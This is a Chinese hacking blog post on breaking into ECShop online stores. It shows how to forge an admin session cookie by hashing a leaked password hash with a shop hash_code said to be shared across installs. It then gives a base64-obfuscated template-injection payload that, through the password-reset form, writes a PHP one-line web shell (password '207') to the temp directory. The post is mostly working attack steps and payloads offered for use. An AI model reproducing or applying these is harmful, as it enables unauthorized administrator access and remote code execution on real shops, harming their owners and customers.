之前出了几个ecshop漏洞,得到了密码但是都破解不出来,虽然知道后台。
用户密码 admin:d03a7617433c2826976062fec569a434
ecshop 有一个表ecs_shop_config ,里面有hash_code 貌似2.7.2 和2.7.3都是31693422540744c0a6b6da635b7a5a93

那就用之前的admin的密码和hash_code的 放在一起再一次MD5
md5(d03a7617433c2826976062fec569a43431693422540744c0a6b6da635b7a5a93 )=76bb7b55d4d0b8283fd4c01994bce575

这个时候 用可以修改COOKIE的浏览器。修改cookie为
ECSCP[admin_id]=1; ECSCP[admin_pass]=76bb7b55d4d0b8283fd4c01994bce575;ECSCP_ID=b5a19c09952c8d1b09a97a89f48df8d1575f1dd1

后面这个ECSCP_ID随意, 然后访问后台,就可以进去了。反正我是成功了N次,不懂你们。

{$user_name'];file_put_contents(base64_decode('Li4vdGVtcC9zaGVsbC5waHA='),base64_decode('PD9waHAgQGV2YWwoJF9QT1NUWycyMDcnXSk7Pz4='));echo $var['$user_name}

<p>{$user_name}您好!<br />
<br />
您已经进行了密码重置的操作,请点击以下链接(或者复制到您的浏览器):<br />
<br />
<atarget ="_blank"href="{$reset_email}">{$reset_email}<br />
<br />
以确认您的新密码重置操作!<br />
<br />
{$shop_name}<br />
{$send_date}</atarget></p>

在后台登陆地方点忘记密码,输入用户和邮箱 提交就会在temp下生成shell.php一句话木马,密码是207
Li4vdGVtcC9zaGVsbC5waHA= 用base64解密就是 ../temp/shell.php

转载请注明来自WebShell'S Blog,本文地址:https://www.webshell.cc/4408.html